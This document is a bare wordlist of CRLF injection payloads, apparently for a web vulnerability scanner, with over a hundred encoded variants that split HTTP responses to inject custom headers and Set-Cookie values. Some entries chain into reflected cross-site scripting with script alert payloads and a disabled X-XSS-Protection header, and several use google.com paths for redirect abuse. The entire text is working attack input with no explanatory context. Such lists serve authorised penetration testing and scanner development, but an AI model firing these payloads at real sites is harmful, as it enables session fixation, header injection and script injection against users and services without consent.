%%0A0AHeader-rahul:rahul
/%%0a0aSet-Cookie:crlf=rahul
/%%0a0aSet-Cookie:crlf=rahul
%0A%20Header-rahul:rahul
/%0A%20Set-Cookie:whoami=rahul
%0AHeader-rahul:rahul
/%0Aset-cookie:%20hello=how;%0Aevil=evil;
/%0Aset-cookie:%20hello=rahul;%0Aevil=rahul;
/%0aSet-Cookie:crlf=rahul
/%0aSet-Cookie:crlf=rahul
/%0aSet-Cookie:rahul=hi;
%0D%0A%09Header-rahul:rahul
/%0D%0A%0D%0ASet-Cookie:crlfinjection=rahul
%0D%0A%20Header-rahul:rahul
/%0D%0A%20Set-Cookie:whoami=rahul
%0D%0AHeader-rahul:rahul
%0d%0aHost:%20{{Hostname}}%0d%0aCookie:%20rahul=hi%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aSet-Cookie:%20rahul=hi%0d%0a%0d%0a
/%0d%0aSet-Cookie:crlf=rahul
/%0D%0ASet-Cookie:crlfinjection=rahul
/%0d%0aSet-Cookie:crlf=rahul
/%0d%0aSet-Cookie:rahul=hi;
%0D%20Header-rahul:rahul
%0DHeader-rahul:rahul
/%0dSet-Cookie:crlf=rahul
/%0dSet-Cookie:crlf=rahul
/%0dSet-Cookie:rahul=hi;
%20%0AHeader-rahul:rahul
%20%0D%0AHeader-rahul:rahul
/%20%0D%0ASet-Cookie:whoami=rahul
%20%0DHeader-rahul:rahul
%23%0AHeader-rahul:rahul
/%23%0aSet-Cookie:crlf=rahul
/%23%0aSet-Cookie:crlf=rahul
%23%0D%0AHeader-rahul:rahul
/%23%0d%0aSet-Cookie:crlf=rahul
/%23%0d%0aSet-Cookie:crlf=rahul
%23%0DHeader-rahul:rahul
/%23%0dSet-Cookie:crlf=rahul
/%23%0dSet-Cookie:crlf=rahul
%23%OAHeader-rahul:rahul
%250AHeader-rahul:rahul
/%250aSet-Cookie:crlf=rahul
/%250aSet-Cookie:crlf=rahul
%25250AHeader-rahul:rahul
/%25250aSet-Cookie:crlf=rahul
/%25250aSet-Cookie:crlf=rahul
%25%30%61Header-rahul:rahul
/%25%30%61Set-Cookie:crlf=rahul
/%25%30%61Set-Cookie:crlf=rahul
%25%30AHeader-rahul:rahul
/%25%30aSet-Cookie:crlf=rahul
/%25%30aSet-Cookie:crlf=rahul
/%2e%2e%2f%0d%0aSet-Cookie:crlf=rahul
/%2e%2e%2f%0d%0aSet-Cookie:crlf=rahul
/%2F..%0d%0aSet-Cookie:crlf=rahul
/%2F..%0d%0aSet-Cookie:crlf=rahul
/%2f%2e%2e%0d%0aSet-Cookie:crlf=rahul
/%2f%2e%2e%0d%0aSet-Cookie:crlf=rahul
/%2F%2E%2E%0D%0ASet-Cookie:whoami=rahul
%3F%0AHeader-rahul:rahul
%3F%0D%0AHeader-rahul:rahul
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28rahul%29%3C/script%3E
/%3f%0d%0aSet-Cookie:crlf=rahul
/%3f%0d%0aSet-Cookie:crlf=rahul
%3F%0DHeader-rahul:rahul
/%3f%0dSet-Cookie:crlf=rahul
/%3f%0dSet-Cookie:crlf=rahul
/%5Cr%20Set-Cookie:rahul=hi;
/%5Cr%5Cn%20Set-Cookie:rahul=hi;
/%5Cr%5Cn%5CtSet-Cookie:rahul%5Cr%5CtSet-Cookie:rahul=hi;
/%5Cr%5Cn%5CtSet-Cookie:rahul=hi;
%5cr%5cnHeader-rahul:rahul
/%5Cr%5CnSet-Cookie:rahul=hi;
/%5Cr%5CtSet-Cookie:rahul=hi;
/%5CrSet-Cookie:rahul=hi;
crlf%0A%20Header-rahul:rahul
crlf%0AHeader-rahul:rahul
crlf%0D%0A%09Header-rahul:rahul
crlf%0D%0A%20Header-rahul:rahul
crlf%0D%0AHeader-rahul:rahul
crlf%0D%20Header-rahul:rahul
crlf%0DHeader-rahul:rahul
crlf%20%0AHeader-rahul:rahul
crlf%20%0D%0AHeader-rahul:rahul
crlf%20%0DHeader-rahul:rahul
crlf%23%0AHeader-rahul:rahul
crlf%23%0D%0AHeader-rahul:rahul
crlf%23%0DHeader-rahul:rahul
crlf%23%OAHeader-rahul:rahul
crlf%3F%0AHeader-rahul:rahul
crlf%3F%0D%0AHeader-rahul:rahul
crlf%3F%0DHeader-rahul:rahul
crlf%5cr%5cnHeader-rahul:rahul
crlf%E5%98%8A%E5%98%8D%0AHeader-rahul:rahul
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-rahul:rahul
crlf%E5%98%8A%E5%98%8D%0DHeader-rahul:rahul
crlf%E5%98%8A%E5%98%8DHeader-rahul:rahul
crlf\r\nHeader-rahul:rahul
%E5%98%8A%E5%98%8D%0AHeader-rahul:rahul
%E5%98%8A%E5%98%8D%0D%0AHeader-rahul:rahul
/%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:rahul=hi;
%E5%98%8A%E5%98%8D%0DHeader-rahul:rahul
%E5%98%8A%E5%98%8DHeader-rahul:rahul
/%E5%98%8D%E5%98%8ASet-Cookie:rahul=hi
/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=rahul
/%E5%98%8D%E5%98%8ASet-Cookie:crlf=rahul
/%E5%98%8D%E5%98%8ASet-Cookie:crlf=rahul;
/%E5%98%8D%E5%98%8ASet-Cookie:crlfrahul=rahul
/%E5%98%8D%E5%98%8ASet-Cookie:rahul=rahul
/%E5%98%8D%E5%98%8ASet-Cookie:whoami=rahul%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE
/google.com/%2F..%0D%0AHeader-rahul:rahul
/\r%20Set-Cookie:rahul=hi;
/\r\n%20Set-Cookie:rahul=hi;
 \r\n Header-rahul:rahul
\r\n Header-rahul:rahul
\r\nHeader-rahul:rahul
\r\nHost: {{Hostname}}\r\nCookie: rahul=hi\r\n\r\nHTTP/1.1 200 OK\r\nSet-Cookie: rahul=hi\r\n\r\n
/\r\nSet-Cookie:rahul=hi;
/\r\n\tSet-Cookie:rahul=hi;
/\rSet-Cookie:rahul=hi;
/\r\tSet-Cookie:rahul=hi;
%u000AHeader-rahul:rahul
/%u000aSet-Cookie:crlf=rahul
/%u000aSet-Cookie:crlf=rahul
/%u000ASet-Cookie:rahul=hi;
/www.google.com/%2E%2E%2F%0D%0AHeader-rahul:rahul
//www.google.com/%2F%2E%2E%0D%0AHeader-rahul:rahul
/嘍嘊Set-Cookie:whoami=rahul嘍嘊嘍嘊嘍嘊<script>alert(1);</script>
/嘍嘊Set-Cookie:whoami=rahul嘍嘊嘍嘊嘍嘊嘼script嘾alert(1);嘼/script嘾
